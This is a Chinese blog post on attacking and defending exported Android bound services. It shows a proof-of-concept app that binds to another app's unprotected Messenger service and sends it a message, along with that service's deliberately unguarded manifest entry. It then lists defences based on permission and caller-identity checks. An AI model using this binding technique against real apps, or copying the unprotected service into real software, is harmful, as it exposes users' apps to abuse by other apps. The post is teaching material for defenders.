关于Android bound Service 攻击和防御

最新推荐文章于 2024-06-28 22:35:37 发布
最新推荐文章于 2024-06-28 22:35:37 发布
阅读量524 收藏
点赞数
分类专栏: Android移动安全 文章标签: android 通信 安全-Service
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sinat_26533265/article/details/51194922
版权

关于Android bound Service 攻击和防御

Android中允许使用Messenger和AIDL进行在多进程间通信bound service。那么这里就有问题产生,我们知道一般情况一个app对应一个进程,也就是多进程间通信,那两个不同的app之间也可以进行通信。那么如果自己实现恶意app就可以对其他app可以进行恶意操作。

【邪恶脸】我们可以写一个攻击案例,使用Messenger来实现,当然AIDL也可以。这里只是测试具体请自行分析:

这个是攻击的app主要内容,绑定被攻击的app的service,获得返回消息:

public class MesActivity extends Activity {
private Button start;
private Button stop;
private ServiceConnection connection=new ServiceConnection() {
    @Override
    public void onServiceConnected(ComponentName name, IBinder service) {
        Messenger messenger=new Messenger(service);
        Message message=Message.obtain(null,1);
        Bundle bundle=new Bundle();
        bundle.putString("key","from service connection");
        message.setData(bundle);
        try{
            messenger.send(message);
        }catch (RemoteException e){
            e.printStackTrace();
        }
        Log.e("TAG","connection");
    }

    @Override
    public void onServiceDisconnected(ComponentName name) {
        Log.e("TAG","disconnection");
    }
};

@Override
protected void onCreate(Bundle savedInstanceState) {
    super.onCreate(savedInstanceState);
    setContentView(R.layout.messenger_layout);
    initView();
}


public void initView(){
    start=(Button)findViewById(R.id.mes_start);
    stop=(Button)findViewById(R.id.mes_stop);

    start.setOnClickListener(new View.OnClickListener() {
        @Override
        public void onClick(View v) {

           Intent intent1=new Intent();
            //com.example.mrsj.hacktool被攻击app包名
            intent1.setPackage("com.example.mrsj.hacktool");
            intent1.setAction("com.example.mrsj.hacktool.Messen");
            intent1.addCategory("com.example.mrsj.hacktool.Mess");
            bindService(intent1,connection,BIND_AUTO_CREATE);
            toastInfo(MesActivity.this,"bind");
        }
    });

    stop.setOnClickListener(new View.OnClickListener() {
        @Override
        public void onClick(View v) {
            unbindService(connection);
            toastInfo(MesActivity.this,"unbind");
        }
    });

}


public void toastInfo(Context context,String s){
    Toast.makeText(context,s,Toast.LENGTH_LONG).show();
}

}

被攻击app的内容:

public class MessenService extends Service {
private Messenger messenger;
private Handler handler=new Handler(new Handler.Callback() {
    @Override
    public boolean handleMessage(Message msg) {
        if (msg.what==1){
           String s= msg.getData().getString("key");
            Log.e("Service",s);
        }
        return true;
    }
});


@Nullable
@Override
public IBinder onBind(Intent intent) {
    messenger=new Messenger(handler);
    return messenger.getBinder();
}
}


manifes文件service内容:


<service android:name=".MessenService">
       <intent-filter>
           <action android:name="com.example.mrsj.hacktool.Messen"/>
           <category android:name="com.example.mrsj.hacktool.Mess"/>
       </intent-filter>
  </service>

结果将会在被攻击app输出from service connection。这里被攻击必须是运行,否则无法绑定。当然你可以自己去启动被攻击的app,然后绑定service。

重点防御:

  • 可以在Manifest文件对暴露的Servic增加签名保护级别。

  • 可以在Binder中进行验证:

    1.使用Binder的静态方法getCallingPid或者getCallingUid来验证IPC调用者的身份,在获得调用者uid以后,可进一步使用PackageManager.getPackagesForUid(int uid)来获得调用者的包名,然后使用PackageManager.getPackageInfo(String Packagename, int flag)检查是否具有相应的权限(使用PackageManager.GET_PERMISSIONS flag)

    2.在Service的OnBind方法中调用Context.checkCallingPermission(String permission)或者checkCallingPermissionOrSelf (String permission) 方法,验证IPC调用者是否拥有指定的权限,同样适用于Messenger;

    3.使用Context.enforceCallingPermission(String permission, String message),如果调用者不具备权限,自动抛出SecurityException

无码不欢
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Android Bound Service攻击
weixin_34178244的博客
03-08 170
小荷才露尖尖角 · 2016/03/15 11:040x00 引子去年12月,【1】 讲述了针对android bound service攻击方法,给出了从apk包中恢复AIDL文件的工具,利用AIDL便可以编写攻击Bound Service的Client。拜这篇文章所赐,笔者也在实际测试工作中发现了类似漏洞,其中的过程却有些曲折。作为白帽子,通常情况下很难直接得到或者恢复AIDL文件,这决定了...
安卓系统组件攻击Service
tlucky的博客
07-06 646
服务是一个Android应用程序组件,它可以在没有用户接口的情况下启动和停止。常用于在后台完成用户指定的操作。一些常见服务的例子包括邮件接收器和短信接收器。虽然这些服务在工作的时候我们看不到,但这些组件通过发送和接收intent来进行进程间通信。在攻击service中,将利用Android服务组件的安全弱点;这些组件可以在没有用户交互的情况下启动和停止。要确定导出的服务列表,可以再次使用drozer模块app. service.info,如下图所示: 使用drozer查看four goats 的服务 命令:
app防攻击办法
weixin_30455023的博客
05-12 472
方法一 要求请求端带上一个随机字符串state(也可以是特定规则生成的,甚至是从服务器上请求过来的),服务端(用过滤/拦截器之类的实现不会影响业务代码)收到之后缓存一定的时间(长短视业务和硬件),每次请求都检查state值是否在缓存中存在(或者是否符合规则,或者是否由服务器生成),如果存在抛弃或者给出特别的响应,第一个被接受的请求就按照正常处理。需要注意的是,判断并缓存这是要一个原子操作。 ...
Android静态安全检查(六):Service劫持
不忘初心的专栏
07-08 1476
什么是Service劫持Android应用中,Service是一个重要的组件,用于执行比较耗时的后台任务,启动一个Service常用的方法是ComponentName startService(Intent service),传入的参数是Intent,Intent使用有两种情况一个是设置action,接收到action的Service,然后启动。一个是明确指定要启动的Service和包名当应用陈故...
电脑所有浏览器打不开_小芯机:电脑中毒的表现有哪些?电脑中毒了怎么办?...
weixin_39971172的博客
11-06 451
电脑中毒是一种十分普遍的现象,很多人在电脑中毒以后,不知如何是好,害怕电脑当中的重要信息暴露,这时我们该怎么办呢?一般情况下,电脑如果被病毒侵染,当电脑关机的时候其中的数据就会被盗取,使得电脑出现问题,今天我们就来了解一下电脑中毒的解决方法以及电脑中毒的表现。一、解决电脑中毒的方法第一种:如果发现电脑出现中毒现象以后,还能正常工作,这时我们就需要关闭电脑当中所以正在运行的程序,而且不要再登录任何的...
Android Servicebound实现
06-24
Android Servicebound实现
浅谈AndroidService的注册方式及使用
08-27
Android中,Service的注册方式有多种,从Service的启动方式上,可以将Service分为Started ServiceBound Service。无论哪种具体的Service启动类型,都是通过继承Service基类自定义而来。在使用Service时,要想...
Android通过Service实现简单的音乐播放
08-27
Android 中的 Service 有很多种类型,例如 Started ServiceBound Service、IntentService 等。Started Service 是一种可以在后台长时间运行的服务,例如播放音乐、下载文件等。Bound Service 是一种可以与其他...
AndroidService服务详解(二)
09-02
在本篇文章中,我们将深入探讨Service的绑定服务(Bound Service)及其相关使用技巧。 首先,绑定服务是一种将Activity与Service紧密关联的方式,允许Activity直接与Service通信,甚至控制Service的生命周期。与...
Android Service中使用Toast无法正常显示问题的解决方法
09-01
Android开发中,Service是一种用于执行长时间运行操作的组件,它并不提供用户界面。然而,有时我们可能需要在Service中向用户展示一些简短的通知,这时通常会使用Toast。但问题在于,当尝试在Service中使用Toast时...
谈动态代理在Android插件中的一些用法
风语的专栏
04-27 1757
我们为设备的插件提供了一系列接口,现在想记录下每个接口的调用情况,通常的做法是在每一个接口函数里都加上一堆上报的代码,这不是不可以,只是有些麻烦了,以后接口里每新增一个函数,就得记得加上上报,对于我这种记性不好的人来说,忘加的概率很大,所以如果有一劳永逸的办法那就好了,以后新增函数都会自动上报。先给出当前接口的形式,如下:public abstract class AbsBluetoothManag
android service 权限问题
pottichu的专栏
06-29 1万+
android service 权限问题
关于Bound Services的常用方式
weixin_33875839的博客
09-19 72
利用服务播放音乐的实例,大部分采用SDK上的方式,MainActivity:package com.example.androidtest; import com.example.androidtest.myService.LocalBinder; import android.os.Bundle; import android.os.IBinder; import andr...
android permission权限与安全机制解析(上)
热门推荐
Shawn_Dut的专栏
02-16 2万+
总结整理了一下android权限相关的知识,由于篇幅过长,分为两篇博客来写,上篇博客主要是详解权限和安全,下篇主要是介绍android6.0权限适配问题:   android permission权限与安全机制解析(下)uses-permission 用法为<uses-permission android:name=”string” android:maxSdkVersion=”integer”/
Android本地拒绝服务漏洞学习与复现
九天
04-07 5441
一、前言 本地拒绝服务一般会导致正在运行的应用崩溃,首先影响用户体验,其次影响到后台的Crash统计数据,另外比较严重的后果是应用如果是系统级的软件,可能导致手机重启。 漏洞触发前提条件: getIntent()的intent附带空数据、异常或畸形数据; 处理getXXXExtra()获取的数据时没有进行异常捕获; 二、漏洞原理 Android应用使用Int
Android】在App里面安装Apk文件
每天不是在写bug就是在写bug的路上
06-28 598
在App里面安装Apk文件
Android中使用startActivityForResult启动活动
qq836869520的博客
06-28 579
方法用于启动一个新的活动(Activity)并期望在该活动完成后返回结果数据给调用方。方法启动目标活动,并传递一个请求码(requestCode),用于标识这次启动请求。方法设置结果代码(resultCode)和可选的结果数据(Intent),然后调用。方法来处理需要返回结果的交互场景,从而实现更加灵活和交互性强的应用程序设计。并关闭后被调用,可以在该方法中获取返回的结果数据并进行处理。方法关闭目标活动并返回结果给调用方。方法,该方法会在目标活动调用。在Android开发中,在调用方活动中,通过调用。
Android SurfaceFlinger——OpenGL ES初始化(十三)
小旭的专栏
06-25 850
上一篇文章我们对 OpenGL ES 相关知识有了一定的了解,并知道在使用 OpenGL ES 是需要先通过 eglGetDisplay() 方法获取 EGLDisplay 默认主屏幕句柄。这里就分析一下 eglGetDisplay() 中的 egl_init_drivers() 初始化 OpenGL ES 的对应流程。
都江堰操作系统(DJYOS)和安卓操作系统(Android)的区别
最新发布
DJYOS都江堰操作系统
06-28 173
应用领域:都江堰操作系统主要应用于实时性和可靠性要求都很高的电力系统控制领域,也广泛适用于物联网系统;安卓主要应用于手机、平板电脑、手表、电视、汽车、可折叠设备和ChromeOS设备。综上所述,都江堰操作系统是一款全新的国产开源操作系统,而安卓是一种基于Linux的开放源代码软件栈,为各类设备和机型而创建,两者在调度核心、应用领域等方面存在着明显的区别。而安卓采用了分层的架构,主要分为应用程序层、应用程序框架层、系统运行库层和Linux内核层。- 调度核心:都江堰操作系统以事件为调度核心;
android怎么判断service和activity是否绑定
06-06
Android 中,可以使用 `ServiceConnection` 接口来判断 `Service` 和 `Activity` 是否已经绑定。具体步骤如下: 1. 在 `Activity` 中创建 `ServiceConnection` 对象,并实现 `onServiceConnected()` 和 `...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值